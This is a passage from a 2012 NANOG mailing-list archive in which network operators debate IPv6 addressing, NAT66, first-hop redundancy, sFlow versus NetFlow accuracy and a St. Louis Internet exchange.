don't know and see what happens. For the most part, you will find that it is truly "96 more bits, no magic". ------- Completely agree. Been playing in GNS3 on the basics and we're starting to play in a full lab soon. > 2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort.... You probably meant 2001:db8:b1aa:b1aa::babe:1 (blah isn't hex and fe80::/10 is link local. 2001:db8::/16 is the example prefix) ------- I stand corrected. :) For the most part, HSRP really isn't even necessary or useful in IPv6 since ND should take care of what HSRP did for IPv4. ------- On the WAN? Sure. On my Internet facing equipment? I disagree. RAs and ND and all that fun stuff needs to be suppressed. I believe F5 has rolled out IPv6 in a subset of their products and that you need pretty recent versions to get IPv6 functionality from them. The ARIN Wiki (http://www.getipv6.info) may be a good source of information on various vendor statuses. Contribute what you know/find out there as well, please. ------- Yes they have and NetScaler is running solid as well. My issues are when you go beyond basic features of any product with IPv6 things get tricky. I need content switching with redirects and whatnot and based on the few efforts I've seen so far I'm not optimistic. Again, routers and switches seem to be further ahead than other products. They all have their limits in advanced features. Back to my ASR comment. Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6. -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there if there weren't enough customers asking for it. Are all the customers naive? I doubt it. They have their reasons. I agree with your "purist" definition and did not say I was using it. My point is that vendors are still rolling out baseline features even today. > 3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design. Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal. Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team. What I'm trying to say is that Roberts comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down. Yes and no. If you have been doing IPv4 long enough to remember pre-NAT IPv4, then, you just need to remember some of the old ways of IPv4. If you have no recollection of IPv4 without NAT, then, you are correct, it is a huge paradigm shift to go back to the way the internet is supposed to have been before we ran out of addresses. ------- This isn't specific to you Owen, but the group in general. I have been around for a while. Not as long as some others here. NAT is a feature and it does have a place. Security. I'm sorry that this frustrates people but security is a layered approach and it starts off simple. If you have a network that doesn't need exposure to the Internet or to someone else you can get fancy with anything from a FW to control source and destination or AD controls so only the accounting team can get in. Sure. They all work. You can also NAT them. Make them invisible. Or null the traffic. The more fundamental the point of defense is the easier it is to understand and sometimes the more difficult it becomes to bypass. Complex security adds a greater potential for vulnerabilities. If you want to protect your car stereo you could lock a cover over it right? But if you could, wouldn't you also just lock the car doors when you leave it? I'm not going to tell you that NAT guarantees you anything. We all know nothing is foolproof. But it is a fundamental feature that works for that purpose. Do I plan on NATting our edge Internet traffic? No. Not for IPv6. Because the protocol was not designed for it. But have I ruled it out as an option for some environments? No. Bring on the flames. I know this is going to get people stirred up. I promise not to ignore the thread.... From valdis.kletnieks at vt.edu Mon Jul 16 11:34:48 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 16 Jul 2012 12:34:48 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Mon, 16 Jul 2012 11:09:28 -0500." <50043CB8.20302@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> Message-ID: <161620.1342456488@turing-police.cc.vt.edu> On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: > -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there > if there weren't enough customers asking for it. Are all the customers naive? > I doubt it. They have their reasons. I agree with your "purist" definition and > did not say I was using it. My point is that vendors are still rolling out base > line features even today. Sorry to tell you this, but the customers *are* naive and asking for stupid stuff. They think they need NAT under IPv6 because they suffered with it in IPv4 due to addressing issues or a (totally percieved) security benefit (said benefit being *entirely* based on the fact that once you get NAT working, you can build a stateful firewall for essentially free). The address crunch is gone, and stateful firewalls exist, so there's no *real* reason to keep pounding your head against the wall other than "we've been doing it for 15 years". -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From bhmccie at gmail.com Mon Jul 16 12:10:56 2012 From: bhmccie at gmail.com (-Hammer-) Date: Mon, 16 Jul 2012 12:10:56 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> Message-ID: <50044B20.10908@gmail.com> I agree. Most are naive. Not all. -Hammer- "I was a normal American nerd" -Jack Herer On 7/16/2012 11:34 AM, valdis.kletnieks at vt.edu wrote: > On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: >> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there >> if there weren't enough customers asking for it. Are all the customers naive? >> I doubt it. They have their reasons. I agree with your "purist" definition and >> did not say I was using it. My point is that vendors are still rolling out base >> line features even today. > Sorry to tell you this, but the customers *are* naive and asking for stupid > stuff. They think they need NAT under IPv6 because they suffered with it in > IPv4 due to addressing issues or a (totally percieved) security benefit (said > benefit being *entirely* based on the fact that once you get NAT working, you > can build a stateful firewall for essentially free). The address crunch is > gone, and stateful firewalls exist, so there's no *real* reason to keep > pounding your head against the wall other than "we've been doing it for 15 > years". > From straterra at fuhell.com Mon Jul 16 12:26:18 2012 From: straterra at fuhell.com (Thomas York) Date: Mon, 16 Jul 2012 13:26:18 -0400 Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo In-Reply-To: <1123039916.37623.1342452079021.JavaMail.root@network1.net> References: <5002DA03.6060007@gont.com.ar> <1123039916.37623.1342452079021.JavaMail.root@network1.net> Message-ID: <036601cd6378$1d23c040$576b40c0$@fuhell.com> Also compiles and works fine for me on 10.7. -- Thomas York -----Original Message----- From: Randy Carpenter [mailto:rcarpen at network1.net] Sent: Monday, July 16, 2012 11:21 AM To: Fernando Gont Cc: NANOG Subject: Re: IPv6 Toolkit v1.2: Latest snapshot, and git repo Appears to compile file on Mac OS X 10.7. The resulting programs run, but I have not tried any real testing with actual data. thanks, -Randy ----- Original Message ----- > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Folks, > > I've posted a snapshot (tarball) of my working copy of the IPv6 > toolkit. The tarball is available at: > > > Additionally, I've created a git repository for the toolkit, such that > collaboration is improved. The git repo is available at: > > > If you have access to a Mac OS box, please try to compile the tools, > and let me know if you find any errors (or let me know if they > compiled cleanly). If you can also run the tools according to some of > the examples in the manuals (and report any problems), that would be > great, too. > > P.S.: If you've sent patches and your patches have not yet been > applied, most likely it just means that I'm catching-up with them > (feel free to resend!). > > Thanks! > > Best regards,-- > Fernando Gont > e-mail: fernando at gont.com.ar || fgont at si6networks.com PGP Fingerprint: > 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.11 (GNU/Linux) > > iQEcBAEBAgAGBQJQAtn3AAoJEJbuqe/Qdv/xYIgH+wTQXJ3iNEnGnA0cMazS32py > 3HfTdcMaEphnfF2a15dq1h/uqF05g3t9KqU744A1XmMtDlChvQ2I77uj2amqaeKi > dED6e/NTuVAxTAI0ZTPIEn7BkDgtqvhuaoth+E4SX73lJC9eJR7e3T3BAtbESZaQ > Sp67lvtgYmqogDc0IQALGNucyhHmacfUBocVLVgmVPn8BwdFxHI80W+Vc6TnKfjm > Yc9ijgUPLTu0hOGD4bpOeQ2V3Dzw9PW17PyJlPr3TzWLzb8g64/zZROtHjXl/V4s > 0JNAZVrHNDvA7kfEujzsoLcnQLCfq3+jzecvXcGwgsYMDXRBL8Lv628OAhrVglY= > =Z3+1 > -----END PGP SIGNATURE----- > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 7086 bytes Desc: not available URL: From rps at maine.edu Mon Jul 16 12:28:26 2012 From: rps at maine.edu (Ray Soucy) Date: Mon, 16 Jul 2012 13:28:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> Message-ID: """ Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6. """ NAT still has its uses; virtualization and cloud infrastructure being one of the most legitimate. Certain kinds of NAT, such as RFC 6296, are very useful, and one of the best methods we have today of delivering IPv6 to smaller networks who wish to have private address space internally ... be it for consistency, ISP independence, multi-homing, or just downright operational parity. I really think all this focus on anti-NAT talk has held-back adoption (and FWIW I used to be one of the people banging the anti-NAT drum the loudest). Keep in mind the collective attitude in communities like this one about NAT for v6 trickles down into decisions made elsewhere; the Linux Netfilter team, for example, is met by a lot of hostility when they talk about including things like 6296 in ip6tables; and as a result it's been left out (even though it's functional). -- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From rchayapa at cisco.com Mon Jul 16 13:26:08 2012 From: rchayapa at cisco.com (Rajendra Chayapathi (rchayapa)) Date: Mon, 16 Jul 2012 18:26:08 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <50043CB8.20302@gmail.com> Message-ID: On the HSRP/ND part , this all falls in the First Hop redundancy areana and can be achieved via any of the following and each has its merits and cons.. 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the faster failover 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP) 3) Default route selection. So depending on the network convergence need etc , any or combination of above can be looked at. Thx Rajendra On 7/16/12 9:09 AM, "-Hammer-" wrote: >Inline - > >-Hammer- > >"I was a normal American nerd" >-Jack Herer > > >1) (This one is currently a personal issue) I am still building up a true >IPv6 skillset. Yes, I understand it for the most part but now is the time >to apply it. > >Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is >to start applying what you don't know and see what happens. For the most >part, you will find that it is truly "96 more bits, no magic". > >------- Completely agree. Been playing in GNS3 on the basics and we're >starting to play in a full lab soon. > >> 2) All the reading you do doesn't prepare you for application and the >>vendors aren't necessarily helping. Feature parity across platforms and >>vendors beyond just "interface x/x/x" and "ipv6 address >>fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to >>take what I understand and apply it beyond the basics I often see >>hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If >>it's working for you hit me offline. Example2? Any vendor product beyond >>a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN >>guys may be rolling deep in IPv6 but not everyone else. I just got an EA >>this morning from CheckPoint for NAT66. This should have been ready for >>prime time years ago. I guess the vendors weren't getting the push from >>the customers so there was no need to make an effort.... > >You probably meant 2001:db8:b1aa:b1aa::babe:1 (blah isn't hex and >fe80::/10 is link local. 2001:db8::/16 is the example prefix) > >------- I stand corrected. :) > > For the most part, HSRP really isn't even necessary or useful in IPv6 >since ND should take care of what HSRP did for IPv4. > > >------- On the WAN? Sure. On my Internet facing equipment? I disagree. >RAs and ND and all that fun stuff needs to be suppressed. > > > I believe F5 has rolled out IPv6 in a subset of their products and that >you need pretty recent versions to get IPv6 functionality from them. The >ARIN Wiki (http://www.getipv6.info) may be a good source of information >on various vendor statuses. Contribute what you know/find out there as >well, please. > > >------- Yes they have and NetScaler is running solid as well. My issues >are when you go beyond basic features of any product with IPv6 things get >tricky. I need content switching with redirects and whatnot and based on >the few efforts I've seen so far I'm not optimistic. Again, routers and >switches seem to be further ahead than other products. They all have >their limits in advanced features. Back to my ASR comment. > > >Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >being able to eliminate NAT. NAT was a necessary evil for IPv4 address >conservation. It has no good use in IPv6. > > >-------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be >there if there weren't enough customers asking for it. Are all the >customers naive? I doubt it. They have their reasons. I agree with your >"purist" definition and did not say I was using it. My point is that >vendors are still rolling out baseline features even today. > >> 3) When I'm not preoccupied attempting to digest the fundamentals I am >>well aware of the retooling of the brain that is required for this in a >>network design. Last year I reached out to Team Cymru and attempted to >>build an IPv6 router template to match their IPv4 template. It was a >>completely different animal. Ironically most of the STIGs and NSA >>reference garbage I used was ten years old but still applied. After >>going thru all those docs my brain hurt trying to orient my ACLs >>properly and go thru all the different attributes you want to block >>where and when. Then I spent some time trying to work our design schemas >>for our ARIN space with the WAN design team. What I'm trying to say is >>that Roberts comments are spot on. It is a very different way of >>thinking on a small scale and a large scale and you can't take your IPv4 >>logic and apply it. I've tried and it's just slowing me down. > >Yes and no. If you have been doing IPv4 long enough to remember pre-NAT >IPv4, then, you just need to remember some of the old ways of IPv4. If >you have no recollection of IPv4 without NAT, then, you are correct, it >is a huge paradigm shift to go back to the way the internet is supposed >to have been before we ran out of addresses. > > >------- This isn't specific to you Owen, but the group in general. I have >been around for a while. Not as long as some others here. NAT is a >feature and it does have a place. Security. I'm sorry that this >frustrates people but security is a layered approach and it starts off >simple. If you have a network that doesn't need exposure to the Internet >or to someone else you can get fancy with anything from a FW to control >source and destination or AD controls so only the accounting team can get >in. Sure. They all work. You can also NAT them. Make them invisible. Or >null the traffic. The more fundamental the point of defense is the easier >it is to understand and sometimes the more difficult it becomes to >bypass. Complex security adds a greater potential for vulnerabilities. If >you want to protect your car stereo you could lock a cover over it right? >But if you could, wouldn't you also just lock the car doors when you >leave it? I'm not going to tell you that NAT guarantees you anything. We >all know nothing is foolproof. But it is a fundamental feature that works >for that purpose. Do I plan on NATting our edge Internet traffic? No. Not >for IPv6. Because the protocol was not designed for it. But have I ruled >it out as an option for some environments? No. > >Bring on the flames. I know this is going to get people stirred up. I >promise not to ignore the thread.... > > > > > From fred at cisco.com Mon Jul 16 14:06:45 2012 From: fred at cisco.com (Fred Baker (fred)) Date: Mon, 16 Jul 2012 19:06:45 +0000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On Jul 13, 2012, at 8:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > >> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> question and it's background anyway. Please be gentle. >> >> In the past, with IPv4, we have used reserved or "non-routable" space >> Internally in production for segments that won't be seen anywhere else. >> Examples? A sync VLAN for some FWs to share state. An IBGP link between >> routers that will never be seen or advertised. In those cases, we have >> often used 192.0.2.0/24. It's reserved and never used and even if it did >> get used one day we aren't "routing" it internally. It's just on segments >> where we need some L3 that will never be seen. >> >> On to IPv6 >> >> I was considering taking the same approach. Maybe using 0100::/8 or >> 1000::/4 or A000::/3 as a space for this. >> > > > Would using "just" Link Locals not be sufficient? If they're on the same link, of course. My understanding of the question said "they're not on the same link". > *(Failing that, as others noted, ULAs are the next "right" answer ... )* > * > * > /TJ From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Mon Jul 16 14:39:46 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Mon, 16 Jul 2012 21:39:46 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: Message-ID: <2059648.BTFFAkdkz4@lsdsrv> On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote: > On the HSRP/ND part , this all falls in the First Hop redundancy areana > and can be achieved via any of the following and each has its merits and > cons.. > > 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the > faster failover > 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP) > 3) Default route selection. > In all honesty, I think using ND as the failover method is a generally bad idea - you have no way of ensuring all endpoints take note of or honour the router preference flag. Additionally, having a 1 second validity lifetime is going to create a lot of ICMPv6 spam across the segment - big deal? perhaps not. But when contrasted with the fact that it can be wholly avoided using one of the aforementioned redundancy protocols, why would you do it? Additionally, as an alternative to RAs, you can simply point default at the all-routers anycast address. Regards, Oliver From james.braunegg at micron21.com Mon Jul 16 17:01:14 2012 From: james.braunegg at micron21.com (James Braunegg) Date: Mon, 16 Jul 2012 22:01:14 +0000 Subject: Real world sflow vs netflow? In-Reply-To: <50032DA2.9020108@foobar.org> References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: Dear All Around a year ago I had the same debate sflow vs netflow vs snmp port counters. read lots of stories lots of myths lots of good information. My Conclusion In the end I did real life testing comparing each platform We routed live traffic (about 250mbits) from our Cisco 7200 G2 routers though Brocade MLXe routers and exported netflow from the Cisco platform and sFlow from the Brocade platform. Each router sent netflow/sflow traffic to two collectors on independent hardware (same specifications) running the same collection netflow analyzer software. The end result was after hours of testing, or even days and weeks of testing there was no significant difference between traffic volumes netflow was showing vs slfow. Ie less than 0.5% variance between each environment. That being said both netflow and sflow both under read by about 3% when compared to snmp port counters, which we put to the conclusion was broadcast traffic etc which the routers didn't see / flow. Regardless if you're going to bill from netflow or sflow in our test environment we saw no significant difference between either platform. Hope that helps Kindest Regards James Braunegg W:? 1300 769 972? |? M:? 0488 997 207 |? D:? (03) 9751 7616 E:?? james.braunegg at micron21.com? |? ABN:? 12 109 977 666?? This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer. -----Original Message----- From: Nick Hilliard [mailto:nick at foobar.org] Sent: Monday, July 16, 2012 6:53 AM To: nanog at nanog.org Subject: Re: Real world sflow vs netflow? On 14/07/2012 09:30, ?ukasz Bromirski wrote: > And that's the biggest problem with sFlow. Packets are sampled, not > flows. You may miss the big or important flow, you don't have > visibility into every conversation going through the device. Unless you enable sampling, which is pretty much necessary for non-trivial traffic volumes. > NetFlow supports IPv6. As well as L2 traffic (v9), MPLS, multicast and > so on. It does, depending on hardware variety, but you need specific platform support for each packet variety (v4 / v6 / mpls / etc), and platform support for this can be very dodgy. You don't need this with sflow - it just punts 1 in N raw packets out to your collector, and the statistical assumptions which were made by the networking device are well documented. I've never seen documentation on the sampling technique used for each netflow implementation. > The measurements provided by sFlow are only approximation of the real > traffic and while it may be acceptable on LAN links where details > don't matter as much, it's hardly good enough to present a real view > on the WAN links. > > sFlow was built to work on switches and provide "some" accuracy, it's > not good enough (unless you do sampling on a 1:5-1:10 basis) to do > billing or some detailed analysis of traffic: Depends on how detailed your requirements are. For billing, most people don't classify by packet analysis, but rather by byte count which can be handled by snmp port counters. If you need to do something fancier, non-sampled netflow is indeed good enough for billing. > http://www.inmon.com/pdf/sFlowBilling.pdf > > You can use it to *estimate* the traffic, detect DDoS, sure. But the > data & scaling used by sFlow (and additionally tricks used by ASIC > vendors implementing it in the hardware) can't change the fundamental > difference - sFlow is really sPacket, as it doesn't deal with flows. agreed, the name is wrong. > NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling > accuracy and things like that, but working with flows is more accurate. Depends on your use case. For large traffic values, you run into the law of large numbers and you can get accurate visibility into what's happening on your network. Certainly, netflow _can_ offer amazingly precise visibility into your network. But the trade-off is that you need specialised hardware to do this on your line cards or your forwarding engine. This drives up both the capex (extra hardware) and the opex (tcam is power hungry) of your network. sflow is much cheaper to implement as you're not maintaining any state on your chassis. You're just picking out a packet every so often. The current generation of high end service provider hardware (juniper mx-3d, cisco sup2t / n7k / asr9k) is pretty much the first generation of hardware which doesn't have crippling netflow limitations, such as poor support for v6 / mpls, too small cache sizes, etc. This fact alone should provide a good indication of how difficult it is to implement it well on fast boxes. sflow is simpler, cheaper and in many cases is simply a better choice if you don't need drill-down into every single flow going through your networking. Nick From rchayapa at cisco.com Mon Jul 16 17:02:50 2012 From: rchayapa at cisco.com (Rajendra Chayapathi (rchayapa)) Date: Mon, 16 Jul 2012 22:02:50 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: True .. Your point of the ICMPv6 storm is on mark and is one of the drawbacks for this solution. On 7/16/12 12:39 PM, "Oliver" wrote: >On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote: >> On the HSRP/ND part , this all falls in the First Hop redundancy areana >> and can be achieved via any of the following and each has its merits and >> cons.. >> >> 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the >> faster failover >> 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP) >> 3) Default route selection. >> > >In all honesty, I think using ND as the failover method is a generally >bad >idea - you have no way of ensuring all endpoints take note of or honour >the >router preference flag. > >Additionally, having a 1 second validity lifetime is going to create a >lot of >ICMPv6 spam across the segment - big deal? perhaps not. But when >contrasted >with the fact that it can be wholly avoided using one of the >aforementioned >redundancy protocols, why would you do it? > >Additionally, as an alternative to RAs, you can simply point default at >the >all-routers anycast address. > >Regards, >Oliver > From jay.hanke at mankatonetworks.com Mon Jul 16 17:23:57 2012 From: jay.hanke at mankatonetworks.com (Jay Hanke) Date: Mon, 16 Jul 2012 17:23:57 -0500 Subject: St Louis Internet Exchange Message-ID: After a bit of googling, I found some references to an Internet Exchange in St. Louis, MO called the St. Louis Regional Exchange. Is this project still active? Thanks, Jay From dhubbard at dino.hostasaurus.com Mon Jul 16 17:25:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 16 Jul 2012 18:25:31 -0400 Subject: Real world sflow vs netflow? References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: From: James Braunegg [mailto:james.braunegg at micron21.com] > > Dear All > > Around a year ago I had the same debate sflow vs netflow vs > snmp port counters. read lots of stories lots of myths lots > of good information. My Conclusion > > In the end I did real life testing comparing each platform > > We routed live traffic (about 250mbits) from our Cisco 7200 > G2 routers though Brocade MLXe routers and exported netflow > from the Cisco platform and sFlow from the Brocade platform. > > Each router sent netflow/sflow traffic to two collectors on > independent hardware (same specifications) running the same > collection netflow analyzer software. > > The end result was after hours of testing, or even days and > weeks of testing there was no significant difference between > traffic volumes netflow was showing vs slfow. Ie less than > 0.5% variance between each environment. > > That being said both netflow and sflow both under read by > about 3% when compared to snmp port counters, which we put to > the conclusion was broadcast traffic etc which the routers > didn't see / flow. > > Regardless if you're going to bill from netflow or sflow in > our test environment we saw no significant difference > between either platform. What are your thoughts on the non-billing aspects after your comparison testing; if you are/were using it for those purposes? We don't use our current netflow for billing, just for security investigation and (ideally) early alerting of abnormal activity like port scans, compromised apps on servers, etc. Thanks, David From james.braunegg at micron21.com Mon Jul 16 17:54:09 2012 From: james.braunegg at micron21.com (James Braunegg) Date: Mon, 16 Jul 2012 22:54:09 +0000 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: Dear David >From a visibility point of view, we obtain as much information as we require to know exactly what's occurring on our network where and when in real-time. We know what's happening, on any interface on any network at any time. - that being said for us the most important visibility is all about the flow of traffic and packet counts.... the security side should be done at the firewall level ! If anyone wants a demo of our sFlow setup happy to show you via a team viewer session or something ! By the way we are using sFlow now Kindest Regards James Braunegg W:? 1300 769 972? |? M:? 0488 997 207 |? D:? (03) 9751 7616 E:?? james.braunegg at micron21.com? |? ABN:? 12 109 977 666?? This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer. -----Original Message----- From: David Hubbard [mailto:dhubbard at dino.hostasaurus.com] Sent: Tuesday, July 17, 2012 8:26 AM To: nanog at nanog.org Subject: RE: Real world sflow vs netflow? From: James Braunegg [mailto:james.braunegg at micron21.com] > > Dear All > > Around a year ago I had the same debate sflow vs netflow vs snmp port > counters. read lots of stories lots of myths lots of good information. > My Conclusion > > In the end I did real life testing comparing each platform > > We routed live traffic (about 250mbits) from our Cisco 7200 > G2 routers though Brocade MLXe routers and exported netflow from the > Cisco platform and sFlow from the Brocade platform. > > Each router sent netflow/sflow traffic to two collectors on > independent hardware (same specifications) running the same collection > netflow analyzer software. > > The end result was after hours of testing, or even days and weeks of > testing there was no significant difference between traffic volumes > netflow was showing vs slfow. Ie less than 0.5% variance between each > environment. > > That being said both netflow and sflow both under read by about 3% > when compared to snmp port counters, which we put to the conclusion > was broadcast traffic etc which the routers didn't see / flow. > > Regardless if you're going to bill from netflow or sflow in our test > environment we saw no significant difference between either platform. What are your thoughts on the non-billing aspects after your comparison testing; if you are/were using it for those purposes? We don't use our current netflow for billing, just for security investigation and (ideally) early alerting of abnormal activity like port scans, compromised apps on servers, etc. Thanks, David From ler762 at gmail.com Mon Jul 16 20:55:40 2012 From: ler762 at gmail.com (Lee) Date: Mon, 16 Jul 2012 21:55:40 -0400 Subject: NAT66 was Re: using "reserved" IPv6 space Message-ID: On 7/16/12, Owen DeLong wrote: > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being > able to eliminate NAT. NAT was a necessary evil for IPv4 address > conservation. It has no good use in IPv6. NAT is good for getting the return traffic to the right firewall. How else do you deal with multiple firewalls & asymmetric routing? Yes, it's possible to get traffic back to the right place without NAT. But is it as easy as just NATing the outbound traffic at the firewall? Lee From ler762 at gmail.com Mon Jul 16 21:04:30 2012 From: ler762 at gmail.com (Lee) Date: Mon, 16 Jul 2012 22:04:30 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <20120716035812.87659.qmail@joyce.lan> References: <20120716035812.87659.qmail@joyce.lan> Message-ID: On 7/15/12, John Levine wrote: >>I feel like I should be able to do something really nice with an >>absurdly large address space. But lack of imagination or whatever.. I >>haven't come up with anything that really appeals to me. > > Use a fresh IP for every HTTP request, email message, and IM. Just think of > how well you can do error management. hrmm... nope, can't think of a single thing. Then again, I'm on the routing & switching team at work, so things like HTTP requests, email messages, and IM are just different types of user traffic that needs to be routed to me. Recall the message I was responding to: >>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all >>> been living in an austerity regime for so long that we've completely >>> forgotten how to leave parsimony behind. Even those of us who worked >>> at companies that were summarily handed a Class B when we mumbled >>> something about "internal subnetting" have a really hard time >>> remembering how to act when we suddenly don't have to answer for every >>> single host address and can design a network to conserve other things >>> (like our brain cells). I read it as design a network >>addressing scheme<< to conserve other things & was hoping someone could share new ways of looking at it. I feel like I'm stuck in "IPv4 think" with an addressing plan that's basically Each site gets a /48. Even the ones with less than 200 people. Each subnet is assigned a /64 except for loopbacks & p2p subnets. First 256 subnets in each /48 are reserved for things like loopback addresses, p2p links, switch management subnets, etc. High order 4 bits of the site address are used for the subnet type. So a /52 tells you the site and if it's users, printers, servers, IP phones, or whatever. Which is *boring*. Nothing novel, no breaking out of "IPv4 think" aside from massively wasting address space. Which brings me back around to my original request for suggestions. What's the new way of looking at designing a network addressing scheme? Regards, Lee From kauer at biplane.com.au Mon Jul 16 21:35:36 2012 From: kauer at biplane.com.au (Karl Auer) Date: Tue, 17 Jul 2012 12:35:36 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <20120716035812.87659.qmail@joyce.lan> Message-ID: <1342492536.6281.149.camel@karl> On Mon, 2012-07-16 at 22:04 -0400, Lee wrote: > Each site gets a /48. Even the ones with less than 200 people. > [...] > Which is *boring*. Nothing novel, no breaking out of "IPv4 think" > aside from massively wasting address space. It's only a waste if you get nothing for it. By using /64 everywhere you get a more homogeneous network, easier to administer, manage, document, maintain... There are similar advantages, writ larger, to using /48 for every site. Whether you have 2, 20, 200, 2000 or 20,000 hosts in a /64 subnet, you have still only used 0% of it, to a dozen or more decimal places. IPv4-think says that's a waste. IPv6-think says "great - all my subnets are large enough". Resizing IPv4 subnets is common; resizing IPv6 subnets will be rare. IPv4-think is conserving addresses. IPv6-think is conserving subnets. We don't buy dining chairs based on the number of atoms in them - we buy enough to seat the people who need seating. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From woody at pch.net Mon Jul 16 21:36:08 2012 From: woody at pch.net (Bill Woodcock) Date: Mon, 16 Jul 2012 19:36:08 -0700 Subject: St Louis Internet Exchange In-Reply-To: References: Message-ID: On Jul 16, 2012, at 3:23 PM, Jay Hanke wrote: > After a bit of googling, I found some references to an Internet > Exchange in St. Louis, MO called the St. Louis Regional Exchange. > Is this project still active? It appears to be dead. The web site redirects to a commercial colo, and the last few ISPs appear to have departed at the end of 2008, after about two years of activity. https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=350 If anyone has any better information, please let us know. -Bill -------------- next part -------------- A non-text attachment was 